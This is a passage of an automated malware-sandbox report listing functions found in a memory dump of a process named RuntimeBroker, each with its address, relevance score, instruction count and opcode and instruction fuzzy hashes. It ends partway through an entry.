                                                                                                      • Instruction ID: ab0937ce71b9997523128cf9bcf92a1230567052c4897d70885e1c310cacc439
                                                                                                      • Opcode Fuzzy Hash: afa665f60199e6aea989e77b343d676288155e8ebc5344f0b4f15618ae88bbe6
                                                                                                      • Instruction Fuzzy Hash: 4CC18D71E1966D9FDB68DB58C8A4BACB7B1FF55300F4001BAD04DA72A2DE346A85CF40
                                                                                                      Function 00007FFD9B9BC460 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &$
                                                                                                      • API String ID: 0-3672554430
                                                                                                      • Opcode ID: ac1ad98f76e30e039d9271c2bf6ad962a8cbe8a11462b8c75ba43ee5ad6766b3
                                                                                                      • Instruction ID: 35c99d0b3d9e11ea61217890d8168d370786d6ffe00b358750d201634acfa88b
                                                                                                      • Opcode Fuzzy Hash: ac1ad98f76e30e039d9271c2bf6ad962a8cbe8a11462b8c75ba43ee5ad6766b3
                                                                                                      • Instruction Fuzzy Hash: 9D91E730A1562D8FDB68EB58C894BEDB7B1FF55300F1041AAD01EA72A6DE356A85CF40
                                                                                                      Function 00007FFD9B9B7D61 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d
                                                                                                      • API String ID: 0-2564639436
                                                                                                      • Opcode ID: c2198cd5786431ac075ddb4ff388fed603e57c9fa7cfbb38aca8889af1caeea4
                                                                                                      • Instruction ID: 45b39b74d9358141b13a4ec3e6557c0e13d39c04ccc85b0130402078ae01e4c9
                                                                                                      • Opcode Fuzzy Hash: c2198cd5786431ac075ddb4ff388fed603e57c9fa7cfbb38aca8889af1caeea4
                                                                                                      • Instruction Fuzzy Hash: B821F331D0926A4FDB119BA4C8156E9BBE0EF49310F0602BBD449E71A1DB2C59408B92
                                                                                                      Function 00007FFD9B9B22E0 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d
                                                                                                      • API String ID: 0-2564639436
                                                                                                      • Opcode ID: df2031e661ecdfd8503c2023cf03734da557fe0166a173d98ba05c2e4697a17d
                                                                                                      • Instruction ID: 5f00225d1626919fd2c23c1c19d47899e8d4b8a13df9dc8ffb683fa79fb678d6
                                                                                                      • Opcode Fuzzy Hash: df2031e661ecdfd8503c2023cf03734da557fe0166a173d98ba05c2e4697a17d
                                                                                                      • Instruction Fuzzy Hash: E911CC31E1953E5AEF64AAA488166FD7BA0EF44704F01023AD91DE22A0DF3C6A504BD2
                                                                                                      Function 00007FFD9B9B075D Relevance: .4, Instructions: 400COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 245bf769c2954281f4008e8199c8f6fa197249b26bf1cbbd8ddfab5638ae1345
                                                                                                      • Instruction ID: bf90625703494aace6e117b52af8d539403ec74096d11c3c26ea83b37ae2c6b3
                                                                                                      • Opcode Fuzzy Hash: 245bf769c2954281f4008e8199c8f6fa197249b26bf1cbbd8ddfab5638ae1345
                                                                                                      • Instruction Fuzzy Hash: CFD10A31B3992D8FE7A8FB2C84A867477D1FF98755B4201B9D05EC72E6CE24A841CB41
                                                                                                      Function 00007FFD9B9BF0ED Relevance: .4, Instructions: 370COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ccb402449543422f4e7fdc13b4139ce610a238b6d7924a5d4188c904e494228b
                                                                                                      • Instruction ID: 09091dfae0f69546070461eec4be40c51d3b4199c81de2759c1fe6358bbe1d83
                                                                                                      • Opcode Fuzzy Hash: ccb402449543422f4e7fdc13b4139ce610a238b6d7924a5d4188c904e494228b
                                                                                                      • Instruction Fuzzy Hash: D5D1E971E1592D8FDBA4EF58C895BE8B7B1FF99300F5041AAD00DE32A5DE346A818F40
                                                                                                      Function 00007FFD9B9B1DE5 Relevance: .3, Instructions: 348COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed2fce63de0c022ba0913c79a16bda566cd3a816160775f921f15f9fa2006a08
                                                                                                      • Instruction ID: 15b87207409f4d4886e1a0afe2cec940f987b7a7c724857d2e3e856f76c36214
                                                                                                      • Opcode Fuzzy Hash: ed2fce63de0c022ba0913c79a16bda566cd3a816160775f921f15f9fa2006a08
                                                                                                      • Instruction Fuzzy Hash: B8B18921F2EA5E1FE7A8A77C54752B97BD2FF94344F44007AD05EC32E6CE2859028781
                                                                                                      Function 00007FFD9B9B0718 Relevance: .3, Instructions: 345COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac5554e47466b3b44f95d2eef5bcd7209dec8c5cb8eefa597528a4b042ca75bc
                                                                                                      • Instruction ID: 529e60bba4a61da44fde3c1416d6b46bbbed6c98cabd05ea62ada3a621719e22
                                                                                                      • Opcode Fuzzy Hash: ac5554e47466b3b44f95d2eef5bcd7209dec8c5cb8eefa597528a4b042ca75bc
                                                                                                      • Instruction Fuzzy Hash: 36A16721F2991E4FE7A8AB6C54697BD77D2FF98340F54007DE05EC32D6DE28A9028781
                                                                                                      Function 00007FFD9B9B67B6 Relevance: .3, Instructions: 331COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b30d042a9d81eca6e3b4a0cd4f06612279c023c1e862136b6f3a98d4810ec2b
                                                                                                      • Instruction ID: b227a16fbf2790009bd1f959e00828639d02f693471e9199d77b1a1271de4931
                                                                                                      • Opcode Fuzzy Hash: 1b30d042a9d81eca6e3b4a0cd4f06612279c023c1e862136b6f3a98d4810ec2b
                                                                                                      • Instruction Fuzzy Hash: D4B1D53061CA4D8FDB69DF28C8557E97BE1EF59310F04426EE84DC7292CA34E945CB82
                                                                                                      Function 00007FFD9B9B2645 Relevance: .3, Instructions: 319COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9a9dcb8b0a05df3354b8750550cc3971ecd278145aa67135cf385815d26471da
                                                                                                      • Instruction ID: 5cb840bd7cd8b6d5feab0bc924b64baa833d1a7ef817a9be8b75a93a78fe1c53
                                                                                                      • Opcode Fuzzy Hash: 9a9dcb8b0a05df3354b8750550cc3971ecd278145aa67135cf385815d26471da
                                                                                                      • Instruction Fuzzy Hash: 89A145207299098BF788B76C9876BB9B2D6FFD8305F540176E01DC33EACD69AC418752
                                                                                                      Function 00007FFD9B9BC93C Relevance: .3, Instructions: 301COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f2fca07a77e0448c429020463d7daa67e7611a65670efc5e6c9040c3628e4bc9
                                                                                                      • Instruction ID: e15c017715844b8786a286ff02872c9ba4e6ae6647c6cda6287a7c1e2d9d9536
                                                                                                      • Opcode Fuzzy Hash: f2fca07a77e0448c429020463d7daa67e7611a65670efc5e6c9040c3628e4bc9
                                                                                                      • Instruction Fuzzy Hash: FCB15371E1991D8FEB94EB68C895BA8B7B1FF58300F5042BAD01DD72A6DE346981CF40
                                                                                                      Function 00007FFD9B9B89FD Relevance: .3, Instructions: 255COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dc36f81279070dad2e4eefcbf2754c32eac8117ead7dab43bee23f5da7c4de14
                                                                                                      • Instruction ID: 1279d7e0a92804a3ed052d27ed948a1f6c01f345616db1a78b5ea49cc95c55c8
                                                                                                      • Opcode Fuzzy Hash: dc36f81279070dad2e4eefcbf2754c32eac8117ead7dab43bee23f5da7c4de14
                                                                                                      • Instruction Fuzzy Hash: EA712831B1995C5FDBA8EB78D8A5AF9B7E1EF59310F05017AE00ED31E2CE28A941C741
                                                                                                      Function 00007FFD9B9B8A50 Relevance: .2, Instructions: 233COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6e9848c13e5096408799089d43a8575a4b53691d347246d70e68e20d4dfaba30
                                                                                                      • Instruction ID: e61e7e4f25cec5ea8c84e04ac5bdbb3071f996690890574ed6106a156f2c2e9e
                                                                                                      • Opcode Fuzzy Hash: 6e9848c13e5096408799089d43a8575a4b53691d347246d70e68e20d4dfaba30
                                                                                                      • Instruction Fuzzy Hash: B661B871B1991D4FEBA8EB68C4A9ABD77E1EF98310F150179E00ED32E6DE24AC418741
                                                                                                      Function 00007FFD9B9B0925 Relevance: .2, Instructions: 213COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 848a6e5ae19e6165f2b6ee8530afbd62daebdf7ac3121f3927c78b55622a7e6f
                                                                                                      • Instruction ID: cfb50d3fbca69d5bd7e84de020a2417c3e14ddabce931095001bf201fa569e62
                                                                                                      • Opcode Fuzzy Hash: 848a6e5ae19e6165f2b6ee8530afbd62daebdf7ac3121f3927c78b55622a7e6f
                                                                                                      • Instruction Fuzzy Hash: 23514521B2AA0E1FE7ACB77994785AD77D2FF8820478000BDE05EC32D6DE2868018740
                                                                                                      Function 00007FFD9B9B7E4D Relevance: .2, Instructions: 212COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67294d2e1971f2641d54a93df2dcdb467b480188bbcddb2a505f8c066ee42ca0
                                                                                                      • Instruction ID: ae486bcb1dcefdcc2ea433d20c5e157f3c344d5457d0767f0169e27f73ead756
                                                                                                      • Opcode Fuzzy Hash: 67294d2e1971f2641d54a93df2dcdb467b480188bbcddb2a505f8c066ee42ca0
                                                                                                      • Instruction Fuzzy Hash: 4A51A530A18A1D8FDB58DF68D855BEDBBF1FF58311F1042AAD04DD3296CA34A946CB81
                                                                                                      Function 00007FFD9B9BD184 Relevance: .2, Instructions: 211COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e4444eba31a8a65398cc9c1b51b8d1f26017ff0effc1a33a5af78019cbc0ddf
                                                                                                      • Instruction ID: 8161ca479181adc1cc0ddbd46eb7007b2a1bcf587b89d2952a4dbe681826d700
                                                                                                      • Opcode Fuzzy Hash: 4e4444eba31a8a65398cc9c1b51b8d1f26017ff0effc1a33a5af78019cbc0ddf
                                                                                                      • Instruction Fuzzy Hash: 55613030A18A1D9FDB58EF98D8A5AACB7F1FF59304F110169D01DD72A6CF34A941CB40
                                                                                                      Function 00007FFD9B9B36EC Relevance: .2, Instructions: 195COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 74d6b66987e504c63f214a9e2df3b81098924b9ef589da082787502e42d902c6
                                                                                                      • Instruction ID: 93815bdacf13fd5ffb1a64406db390bb0870866127058dab8657d332b5d51b01
                                                                                                      • Opcode Fuzzy Hash: 74d6b66987e504c63f214a9e2df3b81098924b9ef589da082787502e42d902c6
                                                                                                      • Instruction Fuzzy Hash: 1B517330918A1C8FDB58DB58D855BE9BBF1FF59310F0082ABD04DD3252DE34A9858F81
                                                                                                      Function 00007FFD9B9B8FEA Relevance: .2, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e03ba2832bae177f0639141b726e188b3fa8839420e8dc32acfe0e287946751c
                                                                                                      • Instruction ID: 0fedaf5a7795b868390ceb8a26cc83fac93d1a56ae13352a9c664712051379b9
                                                                                                      • Opcode Fuzzy Hash: e03ba2832bae177f0639141b726e188b3fa8839420e8dc32acfe0e287946751c
                                                                                                      • Instruction Fuzzy Hash: 3A512531A1D65D9FEB18EFACC829AB87BE0EF56311F04416ED04DC71A2DB28A406CB51
                                                                                                      Function 00007FFD9B9BD1B0 Relevance: .2, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c242d50b96ef88925f71c99671915cf6bd5dd458ea0ad9877319be1af003e2f0
                                                                                                      • Instruction ID: 10dfe855aa453f68ac33759e2052d3c4659dec1ba00648fad435b8b27ed5ba62
                                                                                                      • Opcode Fuzzy Hash: c242d50b96ef88925f71c99671915cf6bd5dd458ea0ad9877319be1af003e2f0
                                                                                                      • Instruction Fuzzy Hash: 92611E30A18A1D9FDB98EF98D895AACB7F1FF59305F110169E01DE72A5CF34A941CB40
                                                                                                      Function 00007FFD9B9B856A Relevance: .2, Instructions: 193COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 94d1690091305240a46880e3e2abeb7375f9178c5b27443adec7855713df2eb8
                                                                                                      • Instruction ID: 56a9571379169bed3ddb1ec8cacf7100396e74c9e49a2fdeb562793f1498770f
                                                                                                      • Opcode Fuzzy Hash: 94d1690091305240a46880e3e2abeb7375f9178c5b27443adec7855713df2eb8
                                                                                                      • Instruction Fuzzy Hash: 6E514530F2EA5F4FE759E77888A56A877D0EF49315F0502BAD01CC31E6DD1CA8468B81
                                                                                                      Function 00007FFD9B9B1758 Relevance: .2, Instructions: 186COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6846dd38e27f38ccc29516ed8136c4117d474314681662784049750c65f2f01f
                                                                                                      • Instruction ID: c7e232bdee64dfd30b5cab6742cff1f5450b3fea07b3a0cd454daf993e2b8089
                                                                                                      • Opcode Fuzzy Hash: 6846dd38e27f38ccc29516ed8136c4117d474314681662784049750c65f2f01f
                                                                                                      • Instruction Fuzzy Hash: 2C517730E1D6DA5FE716A77448216A57FE0EF16314F1902F9D099C71E3CE2CA842CB51
                                                                                                      Function 00007FFD9B9B05A0 Relevance: .2, Instructions: 177COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4968700c6eabb3824d59e21d8f153e775e3ddb438089a4a2e7af75419ab7ef07
                                                                                                      • Instruction ID: e2a7f38ef22c6e851cb9a01e21ebf0c85130845c14dca8d8cd4e07687cbabec4
                                                                                                      • Opcode Fuzzy Hash: 4968700c6eabb3824d59e21d8f153e775e3ddb438089a4a2e7af75419ab7ef07
                                                                                                      • Instruction Fuzzy Hash: E8416B21F2D95A0FE7A8FB3C886697977C1EF95315B150079E44EC32EADD1CAC428782
                                                                                                      Function 00007FFD9B9B0740 Relevance: .2, Instructions: 174COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f95fce117cf98a50f3739d0aed789f69f8754d12187211d0fa5caed2080f3588
                                                                                                      • Instruction ID: d28ef2aad8d8c204683f31a6e3130e7c6ae4b58d158b788aedaf8d5d71e3a904
                                                                                                      • Opcode Fuzzy Hash: f95fce117cf98a50f3739d0aed789f69f8754d12187211d0fa5caed2080f3588
                                                                                                      • Instruction Fuzzy Hash: 1F517530F2991D9FEB98EB68D8A5ABC73E1FF88314F500179E01DD32A5CE2869418B41
                                                                                                      Function 00007FFD9B9B8771 Relevance: .2, Instructions: 170COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0aa887e9d7abfe60df2a8bb3c312cbcef5bdfdf729cd9ae274261b654aacd521
                                                                                                      • Instruction ID: 59c68288d27298742633ef54a9236fb0c2cfd62dfd4ab931c53b5f3b74396639
                                                                                                      • Opcode Fuzzy Hash: 0aa887e9d7abfe60df2a8bb3c312cbcef5bdfdf729cd9ae274261b654aacd521
                                                                                                      • Instruction Fuzzy Hash: 8C51F830F2995D5FEB94EB68D8A56BC77E1FF89314F1500BAE00DD31A6CE286D418B41
                                                                                                      Function 00007FFD9B9BFD99 Relevance: .2, Instructions: 162COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dbed36cfa82a3901f7e4f401f211449d2ee8a456f81834dad87011b5a43e3574
                                                                                                      • Instruction ID: 34afe339ef2c6bbdf6bc6558b5d2f12e512378ddd9acdf3e90bcd56afff2037d
                                                                                                      • Opcode Fuzzy Hash: dbed36cfa82a3901f7e4f401f211449d2ee8a456f81834dad87011b5a43e3574
                                                                                                      • Instruction Fuzzy Hash: B0510735A1995D9FDB94EF98D8A4AECBBF1FF59300F010069E009E72A2CB74A941CB40
                                                                                                      Function 00007FFD9B9B0B5E Relevance: .2, Instructions: 157COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 33723b8c1e672c5e6bec41fa113d6d49167faf6d7489bb1c973c005f22eedb5a
                                                                                                      • Instruction ID: 7c687f7721d562ea8e4af9d19525aaf9b549e16fbd7debe12f7f360b6dec75fb
                                                                                                      • Opcode Fuzzy Hash: 33723b8c1e672c5e6bec41fa113d6d49167faf6d7489bb1c973c005f22eedb5a
                                                                                                      • Instruction Fuzzy Hash: B941F62171DA880FE789AB7C9869A787BD2DF8A215F0901FFE44DC72E7DD589C068341
                                                                                                      Function 00007FFD9B9B14B5 Relevance: .2, Instructions: 157COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 189e20aac599b2a805072f90ae324fd570f711e3a2e013afc4bbce61369547d9
                                                                                                      • Instruction ID: c842ab5409b9230e5101230756779463b595aa1c7a282157c2a1999673e073f3
                                                                                                      • Opcode Fuzzy Hash: 189e20aac599b2a805072f90ae324fd570f711e3a2e013afc4bbce61369547d9
                                                                                                      • Instruction Fuzzy Hash: 62419130A19A1CCFEB68EF68C4A5BA977E0FB64302F10016ED04EC36A1CB759841CB41
                                                                                                      Function 00007FFD9B9B767B Relevance: .2, Instructions: 156COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f8e251f611634715a0d609d83e5cc3f2947018f6bff746517357cf315664b823
                                                                                                      • Instruction ID: 24717b2754fb0e47c63aca953efb01e88e35c9470cf755b5385ea358352f21b5
                                                                                                      • Opcode Fuzzy Hash: f8e251f611634715a0d609d83e5cc3f2947018f6bff746517357cf315664b823
                                                                                                      • Instruction Fuzzy Hash: 29415C23B1DA6E4FEB11B7BCA8A54E97BA0FF9132870903B7D059C3093ED18594687C1
                                                                                                      Function 00007FFD9B9B0780 Relevance: .2, Instructions: 150COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
